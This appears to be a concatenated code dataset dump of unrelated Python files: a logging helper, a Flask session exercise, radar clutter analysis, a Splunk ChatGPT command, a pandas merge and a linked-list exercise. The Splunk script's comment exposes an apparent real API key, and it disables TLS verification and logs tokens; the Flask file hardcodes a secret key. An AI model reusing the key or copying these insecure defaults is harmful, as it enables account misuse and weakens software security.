(:obj:`int`): the current step\n - var_type(:obj:`str`): default set to scalar, support support ['scalar']\n Returns:\n - ret (:obj:`list` of :obj:`list` of :obj:`str`): the list of tb_format info of vars queried\n \"\"\"\n assert (var_type in ['scalar'])\n if var_type == 'scalar':\n ret = []\n var_keys = self.get_var_names(var_type)\n for k in keys:\n if k in var_keys:\n v = self.var_dict[var_type][k]\n if k == 'grad':\n ret.append([k, v.val, cur_step])\n else:\n ret.append([k, v.avg, cur_step])\n return ret\n else:\n raise NotImplementedError\n\n def get_vars_text(self):\n r\"\"\"\n Overview:\n get the string description of var\n Returns:\n - ret (:obj:`list` of :obj:`str`): the list of text description of vars queried\n \"\"\"\n headers = [\"Name\", \"Value\", \"Avg\"]\n data = []\n for k in self.get_var_names('scalar'):\n handle_var = self.var_dict['scalar'][k]\n data.append([k, \"{:.6f}\".format(handle_var.val), \"{:.6f}\".format(handle_var.avg)])\n s = \"\\n\" + tabulate(data, headers=headers, tablefmt='grid')\n return s\n\n def get_star_text(self):\n headers = [\"name\", \"val\", \"name\", \"reward\", \"value\", \"td_loss\", \"pg_loss\", \"at\", \"delay\", \"queued\", \"su\", \"tu\",\n \"tl\"]\n data = []\n k0 = ['cur_lr', 'data_time', 'train_time', 'forward_time', 'backward_time', 'total_loss', 'grad']\n k1 = ['winloss', 'bo', 'bu', 'effect', 'upgrade', 'battle', 'upgo', 'kl', 'entropy']\n k2 = ['reward', 'value', 'td', 'total', 'at', 'delay', 'queued', 'su', 'tu', 'tl', ]\n all_vars = self.get_var_names('scalar')\n for i in range(max(len(k1), len(k0))):\n d = []\n if i < len(k0):\n if k0[i] == 'grad':\n d += [k0[i], \"{:.6f}\".format(self.var_dict['scalar'][k0[i]].val)]\n else:\n d += [k0[i], \"{:.6f}\".format(self.var_dict['scalar'][k0[i]].avg)]\n else:\n d += ['', '']\n\n if i < len(k1):\n d += [k1[i]]\n vals = []\n for k in k2:\n var_key = k1[i] + '_' + k\n if var_key in all_vars:\n vals.append(\"{:.6f}\".format(self.var_dict['scalar'][var_key].avg))\n else:\n vals.append('')\n d += vals\n data.append(d)\n s = \"\\n\" + tabulate(data, headers=headers, tablefmt='grid')\n return s\n\n\nclass AverageMeter(object):\n r\"\"\"\n Overview:\n Computes and stores the average and current value, scalar and 1D-array\n Interface:\n __init__, reset, update\n \"\"\"\n\n def __init__(self, length=0):\n r\"\"\"\n Overview:\n init AverageMeter class\n Arguments:\n - length (:obj:`int`) : set the default length of iters to average\n \"\"\"\n assert (length > 0)\n self.length = length\n self.reset()\n\n def reset(self):\n r\"\"\"\n Overview:\n reset AverageMeter class\n \"\"\"\n self.history = []\n self.val = 0.0\n self.avg = 0.0\n\n def update(self, val):\n r\"\"\"\n Overview:\n update AverageMeter class, append the val to the history and calculate the average\n Arguments:\n - val (:obj:`numbers.Integral` or :obj:`list` or :obj:`numbers.Real` ) : the latest value\n \"\"\"\n if isinstance(val, torch.Tensor):\n val = val.item()\n assert (isinstance(val, list) or isinstance(val, numbers.Integral) or isinstance(val, numbers.Real))\n self.history.append(val)\n if len(self.history) > self.length:\n del self.history[0]\n\n self.val = self.history[-1]\n self.avg = np.mean(self.history, axis=0)\n\n\nclass DistributionTimeImage(object):\n r\"\"\"\n Overview:\n DistributionTimeImage can be used to store images accorrding to time_steps,\n for data with 3 dims(time, category, value)\n Interface:\n __init__, add_one_time_step, get_image\n \"\"\"\n\n def __init__(self, maxlen=600, val_range=None):\n r\"\"\"\n 
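A quick check of AverageMeter's windowing above: val tracks the newest entry, while avg is the mean of at most length recent entries.

    m = AverageMeter(length=3)
    for v in (1.0, 2.0, 3.0, 4.0):
        m.update(v)
    print(m.val, m.avg)  # 4.0 3.0 -> history was trimmed to [2.0, 3.0, 4.0]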
Overview:\n init the DistributionTimeImage class\n Arguments:\n - maxlen (:obj:`int`): the max length of data inputs\n - val_range (:obj:`dict` or :obj:`None`): contain :obj:`int` type val_range['min'] and val_range['max'],\n default set to None\n \"\"\"\n self.maxlen = maxlen\n self.val_range = val_range\n self.img = np.ones((maxlen, maxlen))\n self.time_step = 0\n self.one_img = np.ones((maxlen, maxlen))\n\n def add_one_time_step(self, data):\n r\"\"\"\n Overview:\n step one timestep in DistributionTimeImage and add the data to distribution image\n Arguments:\n - data (:obj:`np.array`):the data input\n \"\"\"\n assert (isinstance(data, np.ndarray))\n data = np.expand_dims(data, 1)\n data = cv2.resize(data, (1, self.maxlen), interpolation=cv2.INTER_LINEAR)\n if self.time_step >= self.maxlen:\n self.img = np.concatenate([self.img[:, 1:], data])\n else:\n self.img[:, self.time_step:self.time_step + 1] = data\n self.time_step += 1\n\n def get_image(self):\n r\"\"\"\n Overview:\n return the distribution image\n Returns:\n img (:obj:`bp.ndarray`): the calculated distribution image\n \"\"\"\n norm_img = np.copy(self.img)\n valid = norm_img[:, :self.time_step]\n if self.val_range is None:\n valid = (valid - valid.min()) / (valid.max() - valid.min())\n else:\n valid = np.clip(valid, self.val_range['min'], self.val_range['max'])\n valid = (valid - self.val_range['min']) / (self.val_range['max'] - self.val_range['min'])\n norm_img[:, :self.time_step] = valid\n return np.stack([self.one_img, norm_img, norm_img], axis=0)\n\n\ndef pretty_print(result, direct_print=True):\n r\"\"\"\n Overview:\n print the result in a pretty way\n Arguments:\n - result (:obj:`dict`): the result to print\n - direct_print (:obj:`bool`): whether to print directly\n Returns:\n - string (:obj:`str`): the printed result in str format\n \"\"\"\n result = result.copy()\n out = {}\n for k, v in result.items():\n if v is not None:\n out[k] = v\n cleaned = json.dumps(out)\n string = yaml.safe_dump(json.loads(cleaned), default_flow_style=False)\n if direct_print:\n print(string)\n return string\n","sub_path":"ctools/utils/log_helper.py","file_name":"log_helper.py","file_ext":"py","file_size_in_byte":19939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605593215","text":"# Dołączanie modułu flask \n\nfrom flask import Flask\nfrom flask import render_template, request, redirect, url_for, flash, session\nfrom flask import Flask, session\nfrom flask_session import Session\n\n# Tworzenie aplikacji\napp = Flask(\"Flask - Lab\")\n\n# Tworzenie obsługi sesji\nsess = Session()\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n # Sprawdzenie czy w sesji dla danego klienta zapisana jest nazwa użytkownika\n if 'user' in session:\n return render_template('t3.html', userdata=session['user'])\n else:\n return render_template('t1.html')\n\n\n@app.route('/login', methods=['POST'])\ndef login():\n # Stworzenie sesji dla kilenta i dodanie pola user\n req_form = request.form.to_dict()\n session['user']= req_form\n return \"Sesja została utworzona
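pretty_print above drops None-valued keys and renders the rest as YAML (round-tripping through JSON to normalize types; safe_dump sorts keys). For example:

    result = {'total_loss': 0.73, 'grad': None, 'cur_step': 100}
    print(pretty_print(result, direct_print=False))
    # cur_step: 100
    # total_loss: 0.73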
    Dalej \"\n\n\n@app.route('/logout', methods=['GET'])\ndef logout():\n # Jeżeli sesja klienta istnieje - usunięcie sesji \n if 'user' in session:\n session.pop('user')\n else:\n # Przekierowanie klienta do strony początkowej\n redirect(url_for('index'))\n \n return \"Wylogowano
    Powrót \"\n\n# Uruchomienie aplikacji w trybie debug\napp.secret_key = 'super secret key'\napp.config['SESSION_TYPE'] = 'filesystem'\nsess.init_app(app)\napp.config.from_object(__name__)\napp.debug = True\napp.run()","sub_path":"Flask exercise/Flask - Przyklad 5.py","file_name":"Flask - Przyklad 5.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352075591","text":"#!/usr/bin/env python\nimport numpy as np\nimport os\nimport glob\nimport json\nfrom netCDF4 import Dataset\nfrom .aux.file_to_radar_object import file_to_radar_object\nfrom .aux.get_var_arrays_from_radar_object import get_var_arrays_from_radar_object\nfrom .calculate_dbz95 import calculate_dbz95_ppi, calculate_dbz95_rhi\n\n\ndef baseline(radar_config_file, filters=False):\n    \"\"\"\n    baseline loops through a day's worth of radar files (specify PPI or HSRHI),\n    calculates the median daily 95th percentile clutter area reflectivity,\n    and saves the value to a netCDF as the baseline 95th percentile clutter area reflectivity.\n    \n    Parameters\n    ----------\n    radar_config_file: str\n        path to JSON file containing specifications: data directory, file extension, clutter map directory, output directory for baseline netCDF, baseline date, scan type, polarization, site, instrument, range limit\n    filters: boolean\n        Include IAH and RH filters \n    \"\"\"\n\n    config_vars = json.load(open(radar_config_file))\n    datadir = config_vars[\"data_directory\"]\n    extension = config_vars[\"file_extension\"]\n    extension = \".v0\"\n    cluttermap_dir = config_vars[\"cluttermap_directory\"]\n    baseline_dir = config_vars[\"baseline_directory\"]\n    baseline_date = config_vars[\"baseline_date\"]\n    dailycsvdir = config_vars[\"daily_csv_dir\"]\n    scantype = config_vars[\"scan_type\"]\n    polarization = config_vars[\"polarization\"]\n    site = config_vars[\"site_abbrev\"]\n    inst = config_vars[\"instrument_abbrev\"]\n    range_limit = config_vars[\"range_limit\"]\n    \n    # Identify which radar band you are using (change if statement as needed)\n    # Most important to identify Ka-band radars\n    if inst == \"kasacr\":\n        radar_band = \"ka\"\n    else:\n        radar_band = inst[0]\n\n    # Read in clutter map netCDF\n    dataset = Dataset(\n        cluttermap_dir\n        + \"cluttermap_\"\n        + scantype\n        + \"_\"\n        + site\n        + inst\n        + \"_\"\n        + \"composite\"\n        + \".nc\"\n    )\n    if scantype == \"ppi\":\n        clutter_map_mask_h = dataset.variables[\"clutter_map_mask_zh\"][:, :]\n    elif scantype == \"rhi\":\n        clutter_map_mask_h = dataset.variables[\"clutter_map_mask_zh\"][:, :, :]\n    if polarization == \"dual\" and scantype == \"ppi\":\n        clutter_map_mask_v = dataset.variables[\"clutter_map_mask_zv\"][:, :]\n    elif polarization == \"dual\" and scantype == \"rhi\":\n        clutter_map_mask_v = dataset.variables[\"clutter_map_mask_zv\"][:, :, :]\n    dataset.close()\n\n    # Prep for filters, if argument is set to True (read in and grab variables)\n    if filters==True:\n        dataset_f = Dataset(\n            dailycsvdir+\"filters/corkasacr/\"\n            + \"filters_\"\n            + scantype\n            + \"_\"\n            + site\n            + inst\n            + \"_\"\n            + baseline_date\n            + \".nc\"\n        )\n\n        total_filter = dataset_f.variables[\"iah_and_rh_filter\"][:]\n        rh_value = dataset_f.variables[\"rh_value\"][:]\n        #datetime = dataset_f.variables[\"datetime\"][:]\n        dataset_f.close()\n\n    # Empty lists to fill in loops below\n    
date_time = []  # date and time strings\n    dbz95_h = []  # 95th percentile reflectivity in H\n    dbz95_v = []  # 95th percentile reflectivity in V\n    pass_filter = []\n\n    # Read in each radar file and turn into radar object and use function to\n    # calculate 95th percentile clutter area reflectivity\n\n    # Will use glob, so grab all files and then sort by datetime\n    files = []\n    for f in glob.glob(os.path.join(datadir, \"*\" + baseline_date + \".*.*\")):\n        files.append(f)\n    files.sort()\n    print(files[0:10])\n\n    if polarization == \"horizontal\":\n        for idx_f, f in enumerate(files):\n            print(f)\n            radar = file_to_radar_object(f, extension)\n            var_dict = get_var_arrays_from_radar_object(radar, radar_config_file)\n            if scantype == \"ppi\":\n                dt, s_h = calculate_dbz95_ppi(\n                    var_dict,\n                    polarization,\n                    range_limit,\n                    radar_band,\n                    clutter_map_mask_h,\n                    clutter_mask_v=None,\n                )\n            elif scantype == \"rhi\":\n                dt, s_h = calculate_dbz95_rhi(\n                    var_dict,\n                    polarization,\n                    range_limit,\n                    radar_band,\n                    clutter_map_mask_h,\n                    clutter_mask_v=None,\n                )\n            date_time.append(dt[0:19])\n            dbz95_h.append(s_h[\"reflectivity_95\"])\n\n            if filters==True:\n                # Read in filters array\n                pass_filter.append(total_filter[idx_f])\n\n        # Calculate median 95th percentile clutter area reflectivity from all times in day\n        dbz95_h = np.array(dbz95_h)\n        if filters==True:\n            pass_filter = np.array(pass_filter)\n            dbz95_h_baseline = np.nanmedian(dbz95_h[pass_filter > 0])\n        else:\n            dbz95_h_baseline = np.nanmedian(dbz95_h)\n\n        # Write baseline 95th reflectivity values to a netCDF file\n        d = Dataset(\n            baseline_dir\n            + \"baseline_\"\n            + scantype\n            + \"_\"\n            + site\n            + inst\n            + \"_\"\n            + baseline_date\n            + \".nc\",\n            \"w\",\n            format=\"NETCDF4\",\n        )\n        value = d.createDimension(\"value\", 1)\n        dbz95_h_base = d.createVariable(\"baseline_dbz95_zh\", np.float64, (\"value\",))\n        dbz95_h_base.long_name = \"Baseline 95th percentile reflectivity (H)\"\n        dbz95_h_base[:] = dbz95_h_baseline\n        d.close()\n\n        return dbz95_h_baseline\n\n    elif polarization == \"dual\":\n        for idx_f, f in enumerate(files):\n            print(f)\n            radar = file_to_radar_object(f, extension)\n            var_dict = get_var_arrays_from_radar_object(radar, radar_config_file)\n            if scantype == \"ppi\":\n                dt, s_h, s_v = calculate_dbz95_ppi(\n                    var_dict,\n                    polarization,\n                    range_limit,\n                    radar_band,\n                    clutter_map_mask_h,\n                    clutter_mask_v=clutter_map_mask_v,\n                )\n            elif scantype == \"rhi\":\n                dt, s_h, s_v = calculate_dbz95_rhi(\n                    var_dict,\n                    polarization,\n                    range_limit,\n                    radar_band,\n                    clutter_map_mask_h,\n                    clutter_mask_v=clutter_map_mask_v,\n                )\n            date_time.append(dt)\n            dbz95_h.append(s_h[\"reflectivity_95\"])\n            dbz95_v.append(s_v[\"reflectivity_95\"])\n\n            if filters==True:\n                # Read in filters array\n                pass_filter.append(total_filter[idx_f])\n\n        # Calculate median 95th percentile clutter area reflectivity from all\n        # times in day\n        dbz95_h = np.array(dbz95_h)\n        dbz95_v = np.array(dbz95_v)\n        if filters==True:\n            # arrays (not lists) are required so the boolean mask can index them\n            pass_filter = np.array(pass_filter)\n            dbz95_h_baseline = np.nanmedian(dbz95_h[pass_filter > 0])\n            dbz95_v_baseline = np.nanmedian(dbz95_v[pass_filter > 0])\n        else:\n            dbz95_h_baseline = np.nanmedian(dbz95_h)\n            dbz95_v_baseline = np.nanmedian(dbz95_v)\n\n        # Write baseline 95th reflectivity values to a netCDF file\n        d = Dataset(\n            baseline_dir\n            + \"baseline_\"\n            + scantype\n            + \"_\"\n            + site\n            + inst\n            + \"_\"\n            + baseline_date\n            + \".nc\",\n            \"w\",\n            format=\"NETCDF4\",\n        )\n        value = d.createDimension(\"value\", 1)\n        dbz95_h_base = d.createVariable(\"baseline_dbz95_zh\", np.float64, (\"value\",))\n        dbz95_v_base = d.createVariable(\"baseline_dbz95_zv\", np.float64, (\"value\",))\n        dbz95_h_base.long_name = 
\"Baseline 95th percentile reflectivity (H)\"\n dbz95_v_base.long_name = \"Baseline 95th percentile reflectivity (V)\"\n dbz95_h_base[:] = dbz95_h_baseline\n dbz95_v_base[:] = dbz95_v_baseline\n d.close()\n\n return dbz95_h_baseline, dbz95_v_baseline\n","sub_path":"src/rca/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"585637549","text":"\nimport json\nimport requests\nimport splunk.Intersplunk\nimport splunk.mining.dcutils as dcu\nimport time\nimport traceback\nimport re\nimport sys\nimport socket\n\nlogger = dcu.getLogger()\n\nCHATGPT_URL=\"https://api.openai.com/v1/chat/completions\"\nCHATGPT_MODEL=\"gpt-3.5-turbo\"\n\n# Default Setting\n# 초기값 세팅\ntoken=None\ncert=None\nuser=None\npasswd=None\n\ndef getResponse(r, uri):\n response = {}\n response['status'] = r.status_code\n response['message'] = r.text\n response['url'] = r.url\n return (response)\n\ndef getException(e, uri):\n response = {}\n response['status'] = 408\n response['message'] = str(e)\n response['url'] = uri\n return (response)\n\n# token Key\n# model\n# role\n# content\n#| chatgpt method=post timeout=120 headers=\"{\\\"Authorization\\\" : \\\"Bearer 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\\\", \\\"Content-Type\\\" : \\\"application/json\\\" }\" data=\"{\\\"model\\\":\\\"gpt-3.5-turbo\\\",\\\"messages\\\": [{\\\"role\\\": \\\"user\\\", \\\"content\\\": \\\"python gugudan example\\\"}]}\" debug=true verify=False\n#| spath input=curl_message output=entry path=choices{}.message.content\n#| table entry\n\ndef requestMethod( uri , token, cert, headers=None, payload=None, user=None, password=None, timeout=60, verify=True, method=\"post\"):\n\n try:\n #payload = json.loads(payload)\n \n if(headers == None) :\n headers = {}\n headers[\"Authorization\"] = \"Bearer %s\" % token\n headers[\"Content-Type\"] = \"application/json\"\n if(token == None) :\n headers[\"Authorization\"] = \"Bearer %s\" % token\n headers[\"Content-Type\"] = \"application/json\"\n \n logger.error(\"--------------------------------------------------------------\")\n logger.error(\"uri : {}\".format(uri))\n logger.error(\"token : {}\".format(token))\n logger.error(\"cert : {}\".format(cert))\n logger.error(\"user : {}\".format(user))\n logger.error(\"password : {}\".format(password))\n logger.error(\"timeout : {}\".format(timeout))\n logger.error(\"verify : {}\".format(verify))\n logger.error(\"method : {}\".format(method))\n logger.error(\"headers : {}\".format(headers))\n logger.error(\"data : {}\".format(payload))\n logger.error(\"## headers : {}\".format(type(headers)))\n logger.error(\"## data : {}\".format(type(payload)))\n\n if token == None:\n if user == None and password == None:\n if method.lower() in (\"get\", \"g\"):\n r = requests.get(uri, params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"head\", \"h\"):\n r = requests.head(uri, params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"patch\"):\n r = requests.patch(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"post\", \"p\"):\n r = requests.post(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"put\"):\n r = requests.put(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"delete\", 
\"del\", \"d\"):\n r = requests.delete(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n else :\n return (getException(e, uri))\n else:\n if method.lower() in (\"get\", \"g\"):\n r = requests.get(uri, auth=(user, password), params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"head\", \"h\"):\n r = requests.head(uri, auth=(user, password), params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"patch\"):\n r = requests.patch(uri, auth=(user, password), data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"post\", \"p\"):\n r = requests.post(uri, auth=(user, password), data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"put\"):\n r = requests.put(uri, auth=(user, password), data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"delete\", \"del\", \"d\"):\n r = requests.delete(uri, auth=(user, password), data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n else :\n return (getException(e, uri))\n else:\n\n if method.lower() in (\"get\", \"g\"):\n r = requests.get(uri, params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"head\", \"h\"):\n r = requests.head(uri, params=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"patch\"):\n r = requests.patch(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"post\", \"p\"):\n r = requests.post(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"put\"):\n r = requests.put(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n elif method.lower() in (\"delete\", \"del\", \"d\"):\n r = requests.delete(uri, data=payload, verify=verify, cert=cert, headers=headers, timeout=timeout)\n else :\n return (getException(e, uri))\n\n return (getResponse(r, uri))\n except requests.exceptions.RequestException as e:\n return (getException(e, uri))\n\ndef syntaxErr():\n results = None\n stack = traceback.format_exc()\n e = \"syntax: | chatgpt [ choice: uri= OR urifield= ] token= content= \" \\\n + \"[ optional: method= datafield= \"\\\n + \"data= user= pass= debug= \"\\\n + \"timeout= | verify=]\"\n splunk.Intersplunk.generateErrorResults(str(e))\n logger.error(str(e) + \". Traceback: \" + str(stack))\n return\n\ndef errorMsg(msg=\"This is the default error message\"):\n results = None\n stack = traceback.format_exc()\n splunk.Intersplunk.generateErrorResults(str(msg))\n logger.error(str(msg) + \". 
Traceback: \" + str(stack))\n\n\ndef enforceHTTPS(uri=None):\n try:\n if re.search(\"^https:\\/\\/\", uri) == None:\n errorMsg(\n 'uri field must start with \"https://\" and curl was provided with the following uri: \"' + str(uri) + '\"')\n quit()\n except Exception as e:\n errorMsg(str(e))\n quit()\n\n\ndef execute():\n try:\n\n # get the keywords suplied to the curl command\n argv = splunk.Intersplunk.win32_utf8_argv() or sys.argv\n \n # for each arg\n first = True\n options = {}\n pattern = re.compile(\"^\\s*([^=]+)=(.*)\")\n\n ## 초기값(Default)\n options['uri'] = CHATGPT_URL\n\n for arg in argv:\n if first:\n first = False\n continue\n else:\n result = pattern.match(arg)\n options[result.group(1)] = result.group(2)\n\n # get the previous search results\n results, dummyresults, settings = splunk.Intersplunk.getOrganizedResults()\n\n # some options are required, raise error and give syntax if they are not given\n if 'uri' not in options and 'urifield' not in options:\n results = None\n syntaxErr()\n else:\n # default to get method if none specified\n if 'method' not in options:\n method = \"post\"\n else:\n method = str(options['method'])\n\n # default to timeout=60\n if 'timeout' in options:\n timeout = float(options['timeout'])\n else:\n timeout = 120\n\n # default uri to None and force https\n if 'uri' in options:\n uri = str(options['uri'])\n else:\n uri = None\n \n # default token\n if 'token' in options:\n token = str(options['token'])\n else:\n token = None\n\n # default role\n if 'role' in options:\n role = str(options['role'])\n else:\n role = \"user\"\n\n # default content\n if 'content' in options:\n content = str(options['content'])\n else:\n content = None\n\n # default model\n if 'model' in options:\n model = str(options['model'])\n else:\n model = CHATGPT_MODEL\n\n if 'verify' not in options:\n verify = False\n else:\n if options['verify'].lower() == \"false\":\n verify = False\n else:\n verify = True\n\n if 'headers' in options:\n user_headers = json.loads(options['headers'])\n else:\n user_headers = None\n\n\n # STREAMING Use Case: iterate through results and run curl commands\n if len(results) > 0:\n # https://github.com/bentleymi/ta-webtools/issues/4$\n # use sleep if provided sleep the defined amount after the first iteration$\n sleepCounter = 0\n\n for result in results:\n # https://github.com/bentleymi/ta-webtools/issues/4\n # use sleep if provided sleep the defined amount after the first iteration\n if 'sleep' in options:\n sleep = int(options['sleep'])\n if sleepCounter > 0:\n time.sleep(sleep)\n sleepCounter = sleepCounter+1\n else:\n sleep = None\n\n # use urifield if provided\n if 'urifield' in options:\n uri = result[options['urifield']]\n\n # use JSON encoded header string if provided\n if 'headerfield' in options:\n headers = json.loads(result[options['headerfield']])\n elif 'headers' in options:\n headers = user_headers\n else:\n headers = None\n\n # if data in options, set data = options['data']\n if 'data' in options:\n data = str(options['data'])\n\n # if datafield in options, set datafield = options['datafield']\n if 'datafield' in options:\n try:\n data = json.loads(result[options['datafield']])\n except:\n data = str(result[options['datafield']])\n else:\n data = None\n\n # debugging option\n if 'debug' in options:\n if options['debug'].lower() in (\"yes\", \"true\", \"t\", \"1\"):\n # for debugging we add results which show the options \\\n # that were sent to the curl command\n result['curl_method'] = method\n result['curl_verifyssl'] = \"Default 
False\"\n result['curl_uri'] = uri\n if data != None:\n result['curl_data_payload'] = data\n if headers:\n result['curl_header'] = headers\n if user_headers:\n result['user_headers'] = user_headers\n if sleep:\n result['curl_sleep'] = sleep\n\n # enforce HTTPS in uri field\n enforceHTTPS(uri)\n\n #logger.error(\"--------------------------------------------------------------\")\n #logger.error(\"### headers : {}, data : {}\".format(type(headers),type(data)))\n #logger.error(\"### headers : {}, data : {}\".format(headers,data))\n\n Result = requestMethod(uri, token, cert, headers, data, user, passwd, timeout, method)\n\n # append the result to results in the splunk search pipeline\n result['curl_status'] = Result['status']\n result['curl_message'] = Result['message']\n #result['curl_content'] = str(json.loads(Result['message']).get('choices')[0]['message']['content'])\n\n # NON-STREAMING Use Case: do not iterate through results, just run curl command\n # this mode doesnt support headerfield but supports the header= field\n else:\n # build splunk result payload\n result = {}\n results = []\n\n # if user specifed data manually\n if 'data' in options:\n data = str(options['data'])\n else:\n data = None\n\n if (data == None) :\n input_data = {}\n else :\n input_data = json.loads(data)\n\n if(model != None) :\n input_data['model']=model\n\n data_dict = dict()\n data_dict['role'] = role\n data_dict['content'] = content\n\n input_data['messages'] = list()\n input_data['messages'].append(data_dict)\n\n data = json.dumps(input_data)\n\n # debug option\n if 'debug' in options:\n if options['debug'].lower() in (\"yes\", \"true\", \"t\", \"1\"):\n # for debugging we add results which show the options \\\n # that were sent to the curl command\n result['curl_method'] = method\n result['curl_verifyssl'] = \"Default False\"\n result['curl_uri'] = uri\n if data != None:\n result['curl_data_payload'] = data\n if user_headers:\n result['user_headers'] = user_headers\n \n # enforce HTTPS in uri field\n enforceHTTPS(uri)\n\n #logger.error(\"--------------------------------------------------------------\")\n #logger.error(\"### TYPE headers : {}, data : {}\".format(type(user_headers),type(data)))\n #logger.error(\"### DATA headers : {}, data : {}\".format(user_headers,data))\n logger.error(\"### DATA content : {}, data : {}\".format(type(content),content))\n\n if(content == None or content ==\"\" ) :\n result['curl_message'] = \"ChatGPT 검색어를 입력해주세요.\"\n else :\n Result = requestMethod( uri, token, cert, user_headers, data, user, passwd, timeout, verify, method)\n \n # append the result to splunk result payload\n result['curl_status'] = Result['status']\n result['curl_message'] = Result['message']\n if(json.loads(Result['message']).get('choices')) : \n result['curl_content'] = str(json.loads(Result['message']).get('choices')[0]['message']['content'])\n \n results.append(result)\n\n # output results\n splunk.Intersplunk.outputResults(results)\n\n except Exception as e:\n stack = traceback.format_exc()\n splunk.Intersplunk.generateErrorResults(str(e))\n logger.error(str(e) + \". 
Traceback: \" + str(stack))\n\n\nif __name__ == '__main__':\n execute()","sub_path":"MegaSphereApp/bin/chatGPT.py","file_name":"chatGPT.py","file_ext":"py","file_size_in_byte":16334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"165028917","text":"import pandas as pd\nimport numpy as np\nstartupData = pd.read_csv('../metaOutput/internKeyurMerge.csv')\ncrunchbase = pd.read_csv('../metaOutput/crunchbaseData.csv')\n\n# Get the union of rows where no information is present\n\n# startupData['founderName'] = crunchbase[startupData.startupName.isin(crunchbase.startupName)]['founderName']\ncommonData = crunchbase[crunchbase.startupName.isin(startupData.startupName)]\n\nstartupData= pd.merge(startupData,commonData,how='outer',on='startupName')\n\nnullcolumns = startupData[startupData['founderName_x']=='[]']\n\nfor index,row in nullcolumns.iterrows():\n startupData.loc[index,'founderName_x'] = startupData.loc[index,'founderName_y']\n\n\n\nnullcolumns = startupData[startupData['city_x'].isnull()]\nfor index,row in nullcolumns.iterrows():\n startupData.loc[index,'city_x'] = startupData.loc[index,'city_y']\n\nnullcolumns = startupData[startupData['website_x'].isnull()]\nfor index,row in nullcolumns.iterrows():\n startupData.loc[index,'website_x'] = startupData.loc[index,'website_y']\n#\nstartupData[\"founderName\"] = startupData[\"founderName_x\"]\nstartupData[\"city\"] = startupData[\"city_x\"]\nstartupData[\"website\"] = startupData[\"website_x\"]\n# # for index,row in commonData.iterrows():\n# # print type(row['founderName_x'])\n# # if (row['founderName_x']!=np.nan):\n# # commonData.loc[index,'founderName'] = row['founderName_x']\n# # else:\n# # commonData.loc[index,'founderName'] = row['founderName_y']\n# #\n# # if (row['city_x']!=np.nan):\n# # commonData.loc[index,'city'] = row['city_x']\n# # else:\n# # commonData.loc[index,'city'] = row['city_y']\n# #\n#\nstartupData.drop(['founderName_x','founderName_y','city_x','city_y','website_x','website_y'],axis=1,inplace=True)\n#\n# startupData = pd.merge(startupData.drop(['founderName','city','website'],axis=1),commonData[['startupName','founderName','website','city']],how='outer',on='startupName')\n\nstartupData.loc[startupData['founderName'].isnull(),'founderName'] = '[]'\n# print startupData.columns\nstartupData.to_csv('../metaOutput/internCrunchbaseMerge.csv', index=False)","sub_path":"dataGeneration/mergingRoutines/internCrunchBaseMerge.py","file_name":"internCrunchBaseMerge.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523647879","text":"__author__ = 'yinyan'\n\"\"\"\nGiven a singly linked list, group all odd nodes together followed by the even nodes. Please note here we are talking about the node number not the value in the nodes.\n\nYou should try to do it in place. 
The program should run in O(1) space complexity and O(nodes) time complexity.\n\nExample:\nGiven 1->2->3->4->5->NULL,\nreturn 1->3->5->2->4->NULL.\n\"\"\"\n#definition for singly-linked list\nclass ListNode(object):\n    def __init__(self, x):\n        self.val=x\n        self.next=None\n\nclass Solution(object):\n    def oddEvenList1(self, head):\n        \"\"\"\n        :param head: ListNode\n        :return: ListNode\n        \"\"\"\n        if not head or not head.next:\n            return head\n\n        dummy1=odd=head\n        dummy2=even=head.next\n\n        # stitch odd-numbered and even-numbered nodes into two chains,\n        # then attach the even chain behind the odd chain\n        while even and even.next:\n            odd.next=even.next\n            odd=odd.next\n            even.next=odd.next\n            even=even.next\n        odd.next=dummy2\n        return dummy1","sub_path":"Algo/OddEvenLinkedList.py","file_name":"OddEvenLinkedList.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
